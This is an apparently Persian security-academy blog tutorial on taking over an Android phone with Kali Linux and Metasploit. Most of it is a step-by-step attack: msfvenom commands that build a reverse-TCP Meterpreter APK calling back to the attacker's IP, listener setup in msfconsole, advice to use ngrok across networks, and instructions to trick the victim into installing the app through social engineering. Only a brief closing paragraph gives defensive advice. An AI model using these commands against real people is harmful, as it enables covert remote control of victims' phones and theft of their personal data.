هک گوشی اندروید با کالی لینوکس | چگونه با Kali Linux گوشی اندروید را هک کنیم؟

0 4,015
۵/۵ - (۵ امتیاز)

فهرست

چرا هک گوشی تلفن همراه اهمیت دارد؟

امروزه، بحث هک گوشی تلفن همراه افراد، خیلی جدی‌تر دنبال می‌شود. دلیل آن هم مشخص است: افراد بسیاری از اطلاعات شخصی و ارزشمند خود را درون تلفن همراه خود نگه می‌دارند! این اطلاعات شامل عکس‌های خانوادگی، اسناد کاری، پیام‌های شخصی و … می‌باشد. هر جا که چنین اطلاعاتی در حال نگهداری باشد، مساله حفظ امنیت آن بسیار اهمیت دارد! بنابراین در این مقاله سعی می‌کنیم با نمایش دادن یکی از روش‌های هک گوشی های اندرویدی، شما را با این روش آشنا کنیم تا بهتر و دقیق‌تر بتوانید امنیت تلفن همراه خود را بالا ببرید. با بدست آوردن دانش در این زمینه و توجه به یک سری علائم که در مقاله “۱۰ نشانه هک شدن گوشی تلفن همراه” بیان کردیم، می‌توانید تا حد زیادی از هک نشدن تلفن همراه خود مطمئن باشید.

آموزش هک گوشی اندرویدی با کالی لینوکس

کالی لینوکس یکی از محبوب‌ترین سیستم عامل های حوزه هک و تست نفوذ می‌باشد. در این سیستم عامل قابلیت‌ها و ابزارهای امنیتی بسیار زیادی برای انجام عملیات هک و تست نفوذ وجود دارد که این مساله باعث علاقه متخصصین این دو حوزه به این سیستم عامل شده است. یکی از محبوب‌ترین فریم ورک هایی که درون این سیستم عامل وجود دارد، متاسپلویت می‌باشد. متاسپلویت یکی از قدرتمندترین فریم ورک های تست نفوذ است که امکانات زیادی در اختیار شما قرار می‌دهد. بوسیله این فریم ورک کارهای بسیار زیاد و متنوعی می‌توان انجام داد اما هدف ما در اینجا، هم گوشی اندرویدی می‌باشد. در زیر بصورت گام به گام نحوه انجام این کار را آموزش می‌دهیم.

ساخت پیلود با msfvenom

اول از همه می‌بایست پیلود خود را ایجاد کنیم. برای این کار، ترمینال کالی لینوکس را باز کنید و به کمک msfvenom و دستور زیر پیلود را ایجاد کنید:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=6060 R > payload.apk

در این دستور:

  • msfvenom نام ابزار مورد استفاده می‌باشد
  • بوسیله آپشن p می‌توانید نوع پیلود را مشخص کنید. از آنجاییکه بحث ما در مورد اندروید است، پیلود مورد نظر را بصورت یک reverse_tcp اندرویدی انتخاب می‌کنیم
  • آپشن LHOST آدرس IP هکر می‌باشد. بجای ۱۹۲.۱۶۸.۱.۳ باید IP هکر وارد شود که از طریق دستور ifconfig قابل مشاهده است (برای زمانی که مهاجم و قربانی در یک سابنت قرار دارند). اگر قربانی و هکر در یک شبکه مشترک نباشند، مهاجم باید از سرویس‌هایی مثل ngrok استفاده کند و IP که از ngrok دریافت می‌کند را در این قسمت وارد کند. در حالت دیگر می‌تواند از یک آدرس IP که درون NAT قرار ندارد استفاده کند.
  • آپشن LPORT پورت هکر می‌باشد. در اینجا هم می‌توانید پورت دلخواه خود را انتخاب کنید.
  • payload.apk هم نام خروجی می‌باشد. یعنی خروجی msfvenom درون این فایل ریخته می‌شود که این نام را هم می‌توانید به دلخواه خود تغییر دهید.

در اصل هکر قرار است یک پیلود ایجاد کند، سپس آن را به قربانی بدهد. قربانی با اجرا کردن پیلود هکر برروی تلفن خود، باعث بوجود آمدن دسترسی هکر به تلفن همراهش می‌شود.

راه اندازی Listener از msfconsole

حالا که پیلود آماده شده است، باید یک Listener ایجاد کنیم. Listener یک شنونده است! یعنی هکر Listener را راه‌اندازی می‌کند تا به محض اجرا شدن پیلودِ هکر، سیستم او در حال Listen باشد و به تلفن همراه قربانی دسترسی بگیرد. برای ایجاد Listener، ابتدا ترمینال کالی لینوکس را باز کنید و سپس دستور زیر را بزنید تا فریم ورک متاسپلویت باز شود:

mdfconsole

بعد از باز شدن کنسول متاسپلویت، دستورات زیر را به ترتیب وارد کنید. اول از همه multi-handler را انتخاب کنید:

use exploit/multi/handler

سپس یک مترپرتر Reverse_tcp را بوسیله دستور زیر راه اندازی کنید:

set payload android/meterpreter/reverse_tcp

بعد بوسیله LHOST آدرس IP سیستم خود و بوسیله LPORT پورت مورد نظر خود را انتخاب کنید. بنابراین به ترتیب دستورات زیر را وارد کنید:

set LHOST 192.168.1.3
set LPORT 6060

بنابراین ترمینال شما به شکل زیر خواهد بود:

سپس ReverseListenerBindAddress و ReverseListenerBindPort را مشخص می‌کنیم:

set ReverseListenerBindAddress 192.168.1.3
set ReverseListenerBindPort 6060

دسترسی به گوشی تلفن همراه

در نهایت دستور اکسپلویت را وارد کنید تا عملیات آغاز شود:

exploit

حال باید هکر فایل payload.apk را به قربانی برساند و او را متقاعد کند تا آن را برروی گوشی خود نصب کند. در این فاز هکر از تکنیک‌های مهندسی اجتماعی استفاده می‌کند تا نصب این اپلیکیشن را طبیعی و منطقی جلوه دهد.

بعد از برقراری ارتباط با گوشی اندرویدی قربانی، خط فرمان به شکل زیر در می‌آید:

و در اینجا دسترسی ایجاد می‌شود.

حال با زدن دستور help می‌بینیم که حدودا به تمام اختیارات ممکن دسترسی داریم:

جلوگیری از هک گوشی اندروید

با این آموزش آموختیم که چطور یک هکر بوسیله کالی لینوکس، می‌تواند به تلفن همراه افراد مختلف دسترسی بگیرد و از اطلاعات آن سواستفاده کند. بنابراین، همواره از نصب اپلیکیشن‌های نامعتبر و ناشناخته پرهیز کنید. همچنین برای نصب اپلیکیشن‌ها، از مارکت‌های معتبر و امن مثل Google Play Store استفاده کنید. همچنین همواره متوجه باشید که چه ابزارها و اپلیکیشن‌هایی با چه دسترسی‌هایی برروی تلفن همراه شما نصب شده‌اند.

درباره ما

ترجنس | thregence.ir
آکادمی ترجنس | edu.thregence.ir
دوره‌های آکادمی ترجنس | courses.thregence.ir
اینستاگرام | instagram.com/thregence
تلگرام | t.me/thregence
یوتوب | https://bit.ly/30mGowo
آپارات | aparat.com/thregence

ارسال یک پاسخ